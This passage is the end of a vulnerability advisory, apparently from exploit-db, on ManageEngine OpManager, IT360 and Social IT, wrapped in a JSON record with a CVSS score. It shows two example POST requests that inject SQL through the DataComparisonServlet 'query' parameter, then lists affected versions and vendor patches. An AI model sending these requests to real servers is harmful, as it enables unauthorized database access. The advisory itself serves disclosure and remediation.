11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}}
